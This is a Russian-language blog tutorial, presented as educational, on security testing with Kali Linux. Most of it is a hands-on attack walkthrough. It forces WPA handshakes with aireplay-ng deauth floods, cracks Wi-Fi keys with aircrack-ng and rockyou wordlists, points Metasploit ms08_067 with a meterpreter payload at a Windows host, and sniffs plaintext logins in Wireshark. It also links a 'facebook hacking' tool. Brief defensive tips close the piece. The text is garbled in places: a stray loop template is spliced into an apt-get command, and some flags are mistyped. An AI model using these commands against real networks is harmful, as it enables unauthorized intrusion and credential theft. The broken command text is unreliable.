Проверка информационных систем на безопасность

Под информационной безопасностью понимают защиту интересов субъектов информационных отношений. Основными составляющими информационной безопасности является конфиденциальность, целостность, доступность.

Cvh67pVW8AAdOgl

По большой части в университетах учат методологию обеспечения информационной безопасности, организационное-правовое обеспечение, техническое и методическое обеспечение ИБ, криптографические методы и средства обеспечения ИБ, методы шифрования. Но отчасти теорический опыт не коррелирует с владением определенных программ, операционных систем, с помощью которых можно произвести диагностику, произвести поиск уязвимостей, перехватить трафик.

Для наших практических примеров мы будем использовать: виртуальное окружение, операционную систему и специальные программы.

ВСЕ НАШИ ДЕЙСТВИЯ БУДУТ ПРОХОДИТЬ В УЧЕБНЫХ ЦЕЛЯХ!

1)Виртуальное окружение для нашей операционной системы.

  • Virtualbox (Одно из мощных средств, которое можно использовать в домашних условиях, скачать можно тут https://www.virtualbox.org/ )
  • Wmware Player (можно использовать для некоммерческих целей, скачать можно тут https://www.vmware.com/ru/products/player/faqs.html

2)Операционная система

Ubuntu (и устанавливать на нее специальное программное обеспечение,последняя стабильная в Ubuntu 14.04.5 LTS с поддержкой до 2019 года, скачать Ubuntu можно на официальном сайте http://ubuntu.ru/get)

32

или Kali linux — для продвинутых специалистов по информационной безопасности (последняя версия — 2017.1, скачать ее можно на официальном сайте https://www.kali.org/downloads/);

Kali Linux_Screenshots1

(Поскольку Ubuntu и Kali Linux основан на Debian, то написанные команды будут работать в обоих ОС).

3) Специальное программное обеспечение.

  • Nmap — для анализа открытых портов TCP;

43

  • Wareshark — для анализа сетевого трафика (сниффер).

wiresharkonubuntu1-1024x578

  • Metasploit Framework

 Figure2

Подготавливаем стенд

Для дополнительных целей нам еще понадобится дополнительный WIFI адептер — благо он стоит рублей 800, так что закупаем необходимое оборудование

Устанавливаем операционную систему. Настраиваем сетевой интерфейс. Желательно настроить с типом подключения — сетевой мост.

423

Можно использовать средства виртуальной разработки, такие как Vagrant или Docker (но у них не получится создать физическое WLAN устройство и поэтому не получится переключить его в режим монитора).

vagrant init Sliim/kali-linux-2.0-amd64
vagrant up

=-

# Конфигурационный файл vagrant
Vagrant.configure(«2») do |config|
config.vm.box = «Sliim/kali-linux-2.0-amd64»
end

#переходим в суперпользователя
sudo -s

# устанавливаем nmap
apt-get install nmap

# устанавливаем wareshark
(компилируем из исходников)

wget https://1.na.dl.wireshark.org/src/wireshark-2.2.5.tar.bz2
tar -zxvf wireshark-2.2.5.tar.bz2
cd wireshark-2.2.5
make
make install clear

(или добавляем репозиторий и устанавливаем)
sudo add-apt-repository ppa:wireshark-dev/stable
apt-get updatehile (<условие>) {
<тело цикла>
}
Смотрим доступные сетевые адаптеры.

Команда Ifconfig

434

# Устанавливаем Reaver
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev build-essential libssl-dev

sudo wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
sudo wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz

sudo tar -xzvf reaver-1.4.tar.gz
cd reaver-1.4
cd src
sudo ./configure
sudo make
sudo make install

# Распаковываем aircrack

tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1

Осуществляем брутфорсинг

# Проверяем сетевые устройства
sudo airmon-ng check

# Некоторые службы нам помешают. Мы их останавливаем или убиваем Kill PID

sudo stop network-manager
sudo stop avahi-daemon
sudo killall wpa_supplicant
или apt-get remove avahi-daemon

# Поднимаем нужный wifi интерфейс

sudo airmon-ng start wlan0
# Поднять и проверить интерфейсы мы можем командой.
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0 # Покажет если wlan0 в режиме монитора сейчас

airodump-ng wlan0 # Показываем все доступные WLAN

# Запускаем мониторинг канала, для этого создадим папку и будем записывать туда всю передачу трафика по беспроводному каналу 802.11

mkdir snif
airodump-ng -w ‘~/snif/’ mon0

ewe

После перехвата hanshake, мы модем открыть файл *.cap в программе wireshark.

e2qe

Если вы не хотите ждать пока airodump-ng перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа. После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.

# Отправить широковещательное deauth сообщение
aireplay-ng —deauth 100 -a 00:11:22:33:44:55 mon0 —ignore-negative-one

# Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента)
aireplay-ng —deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 —ignore-negative-on

Снимок

Если вы не можете получить hanshake после захвата, то вы можете использовать деатификацию беспроводного клиента

aireplay-ng -0 1 -a 00:1C:10:AF:FA:4D -c 68:A3:C4:34:FC:6F mon0
-0        Сообщает aireplay-ng, чтобы перейти в режим деавтоматической атаки
1         Деантификация только одного клиента
-a         BSSID цели
-c         МАС адрес клиента
mon0        Интерфейс монитора

После того, как вы получили the WPA handshake, остановите захват. И начните перебирать ключи с помощь словаря.

Атака по словарю значительно ускоряет и в целом повышает шансы успешности взлома пароля методом перебора. Не может быть одного самого лучшего словаря – под разные ситуации требуются разные словари.

aircrack-ng -w password.txt -b 00:1C:10:AF:FA:4D *.cap

qwr

Словарь от создателей rockyou является универсальным словарём, хорошо подходящим, например, для атаки на пароль Wi-Fi или веб-службы. В Kali Linux данный пароль размещён в (сжатом) файле /usr/share/wordlists/rockyou.txt.gz

#На любую другую систему его можно установить командой
git clone git://git.kali.org/packages/wordlists.git

Словарь rockyou нужно оптимизировать и очищать для использования под конкретные нужды. Например, если мы знаем, что длина пароля в веб службе составляет от 8 до 30 символов и что обязательно должны использоваться символы как минимум из двух групп (большие буквы, маленькие буквы, цифры, знаки), то очистка rockyou с помощью PW-Inspector будет выглядеть так:

pw-inspector -i wordlists/rockyou.txt -m 8 -M 30 -c 2 -l -u -n -p

Оптимизация для взлома Wi-Fi будет выглядеть следующим образом. Считываем в стандартный вывод пароли из файла rockyou.txt (cat rockyou.txt), сортируем их (sort), и удаляем повторяющиеся (uniq), из оставшихся паролей выбираем те, которые 8 или более символов, но менее 63 символов (-m 8 -M 63), полученный список сохраняем в файл newrockyou.txt (> newrockyou.txt):
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt

Программа BruteX поставляется с подборкой словарей для брут-форса удалённого входа в различные службы и веб-приложения. Посмотреть доступные словари можно здесь: https://github.com/1N3/BruteX/tree/master/wordlists

21

Словари DirBuster. DirBuster — это многопотоковое Java приложение, предназначенное для брутфорса имён директорий и файлов веб-приложений и веб-серверов. DirBuster пытается найти скрытые каталоги и файлы.

Описание словарей, поставляемых с программой DirBuster

  • directory-list-2.3-small.txt — (87650 слов) — Директории/файлы которые были найдены как минимум на трёх разных хостах
  • directory-list-2.3-medium.txt — (220546 слов) — Директории/файлы которые были найдены как минимум на двух разных хостах
  • directory-list-2.3-big.txt — (1273819 слов) — Все директории/файлы которые были найдены
  • directory-list-lowercase-2.3-small.txt — (81629 слов) — Версия не чувствительная к регистру для directory-list-2.3-small.txt
  • directory-list-lowercase-2.3-medium.txt — (207629 слов) — Версия не чувствительная к регистру для directory-list-2.3-medium.txt
  • directory-list-lowercase-2.3-big.txt — (1185240 слов) — Версия не чувствительная к регистру для directory-list-2.3-big.txt
  • directory-list-1.0.txt — (141694 слов) — Оригинальный список без изменения порядка
  • apache-user-enum-1.0.txt — (8916 имён пользователей) — Используется для предположения имён пользователей apache на котором включён модуль userdir, основывается на набранных именах пользователей (неупорядоченный)
  • apache-user-enum-2.0.txt — (10341 имён пользователей) — Используется для предположения имён пользователей apache на котором включён модуль userdir, основывается на ~XXXXX найденном во время генерации списка (упорядоченный

Пример хакинга wpa/wpa2 без использования словаря

Списки слов от Metasploit.  В основном эти словари предназначены для брут-форса удалённого входа в различные службы, имеются неплохие универсальные словари с именами пользователей и паролями (Словари для перебора баз данных (таблиц, полей и прочего)).
………..
├── tftp.txt
├── tomcat_mgr_default_pass.txt
├── tomcat_mgr_default_userpass.txt
├── tomcat_mgr_default_users.txt
├── unix_passwords.txt
├── unix_users.txt
├── vnc_passwords.txt
………………..
C sqlmap поставляются заточенные для баз данных словари, они размещены по пути /usr/share/sqlmap/txt/
Словари Ncrack. Программа Ncrack имеет качественные списки слов для брутформа удалённых служб. Словари располагаются в директории /usr/share/ncrack/ и разделены на имена пользователей и пароли.
Списки слов Nmap
Nmap поставляется с несколькими списками, среди которых имеется словарь с паролями. На Kali Linux все они размещены в папке /usr/share/nmap/nselib/data/.
Словари Wfuzz. Wfuzz – это ещё один бурт-форсер веб-приложений. В папке /usr/share/wfuzz/wordlist/ можно найти разные подборки, в том числе слова, которые могут быть именами или паролями.

Инструмент для взлома facebook https://kali.tools/all/?tool=447

Сканер уязвимостей Drupal. https://kali.tools/all/?tool=363

Полный список инструментов для тестирования на проникновение можно найти на сайте https://kali.tools/all/

21

Анализируем открытые порты устройств.

Nmap («Network Mapper») — это утилита с открытым исходным кодом для исследования сети и проверки безопасности. Многие системные администраторы и администраторы сетей также находят её полезной для таких задач как инвентаризация сети, управления расписанием служб обновлений и мониторинга аптайма хостов или служб. Nmap использует сырые IP пакеты новаторским способом, чтобы определить, какие хосты доступны в сети, какие службы (имя и версия приложений) эти хосты предлагают, какие операционные системы (и версии ОС) там запущены, какие типы фильтров пакетов/файерволов используются и дюжины других характеристик.

Сканируем айпи адреса в подсети (192.168.1). Используем 24 битную маску.

nmap -sn 192.168.1.1/24

53345

Сканируем нужный нам айпи адрес устройства. В данном случае. Был выбрал 44 айпишник, на адресе которого установлен Windows 10 и открыт firewall.

53

Используем порт 445, на котором находится сервис microsoft-ds. SMB (Server Message Block) – сетевой протокол для удаленного доступа к файлам и принтерам. Именно он используется при подключении ресурсов через \servername\sharename. Протокол изначально работал поверх NetBIOS, используя порты UDP 137, 138 и TCP 137, 139. С выходом Windows 2000 стал работать напрямую, используя порт TCP 445. SMB используется также для входа в домен Active Directory и работы в нем. Статья про отключение SMBv1 есть на https://habrahabr.ru/company/pc-administrator/blog/331906/

Устанавливаем set RHOST = значение айпи адреса.

5433

Show payloads покажет нам все payload’ы, которые совместимы с выбранным нами сплоитом. Для нашего случая мы используем запасной tcp meterpreter, задав его командой set PAYLOAD windows/meterpreter/reserve_tcp, что запустит командную оболочку на удаленном сервере, если к нему будет успешно получен доступ. Сейчас нам нужно снова запустить команду show options для того, чтобы убедиться в том, что все обязательные для заполнения поля имеют соответствующие значения. Только в этом случае эксплоит успешно запустится.

цуцкукцк

К сожалению, на Windows 10 эксплойты (ms08_067_netapi) не работают. Эксплойт ms08_067_ NetApi работает с операционной системой windows xp, 2003 и тд. Так что — продолжаем поиски подходящего эксплойта!

112

24324

Если говорить о защите последней OS Windows 10.

Microsoft известна своим внимательным подходом к функциям защиты от эксплойтов, которые интегрированы в Windows. Там последовательно появлялись DEP, SEHOP, ASLR, IE11-EPM, IE11-64bit_tabs, HEASLR. Бесплатный инструмент EMET позволял принудительно включать такие настройки для процессов. В то же время, только с Windows 10 Microsoft стала предпринимать указанные выше шаги по закрытию уязвимых мест, которые используются LPE-эксплойтами.

Новый веб-браузер Edge в Windows 10, в котором Microsoft отказалась от всех устаревших технологий типа COM или ActiveX, которые использовались для внедрения своего кода в веб-браузер вредоносными программами (то же постигнет и Flash Player). Она также закрыла другие возможные места внедрения (инжекции) вредоносного кода в run-time запущенный процесс, а также использует AppContainer и 64-битные вкладки по умолчанию. Использование функции Win32k syscalls filtering сделает этот веб-браузер еще более безопасным.

Перехват трафика с помощью Wireshark

В то время, пока Wireshark прослушивает сетевой трафик и захватывает его. Я открыл браузер и залогинился на веб-сайте, используя имя пользователя и пароль. Когда процесс авторизации был завершён и я вошёл на сайт, я вернулся и остановил захват в Wireshark. Вообще, фильтрацию трафика можно делать и не останавливая захват. После запуска, например, можно установить фильтрацию и просматривать только захват, удовлетворяющий определённым требованиям.

Обычно в Wireshark множество данных. Но нас интересуют только данные, отправленные методом POST.

цуцкукцк

3

Видите я выделил строчку log=Dimon&pwd=justfortest?

Т.е. log=Dimon (имя пользователя: Dimon), pwd=justfortest (пароль: justfortest)

Как защититься от брутфорсинга, перехвата и прочего?

1. Не позволяйте посторонним лицам иметь доступ в вашу сеть. Например, не нужно свой Wi-Fi делать публичным, не нужно сообщать пароль от него посторонним лицам. Желательно использовать WPA2 шифрование.

2. Когда вы сами пользуетесь публичными точками доступа, то, хотя бы, помните об угрозе перехвата пароля. Даже если вы не производили вход (не вводили логин и пароль), то ваш браузер постоянно обменивается с сайтами, на которых вы авторизованы, данными кукиз. Это не тоже самое что пароль, иногда кукиз просто бесполезны.

Это не значит что нужно прекратить пользоваться публичными точками доступа. Но поменяв пароль, когда вернётесь к «безопасной» сети, вы сделаете бессмысленным захват тех данных, который мог произойти пока вы пользовались публичной сетью.

3. Используйте VPN, эта технология способна решить все проблемы с небезопасными сетями разом.

4. Самый действенный способ — SSL-сертификаты. У меня по этому поводу две новости: плохая и хорошая. Начну с плохой: от нас, от пользователей сайтов, не зависит, установлен ли на веб-сайте SSL-сертификат, если сертификат не установлен, то мы никак не можем это исправить. Хорошая новость: почти все популярные веб сайты (разные твитеры, вконтакте, фейсбуки, гугл-почты, яндекс-почты и т. д.) имеют эти сертификаты. Даже у Википедии теперь есть!

Использованы материалы

https://habrahabr.ru/company/eset/blog/281481/

Взлом пароля веб-сайта с использованием WireShark (и защита от этого)

Читайте также:

1 комментарий

Добавить комментарий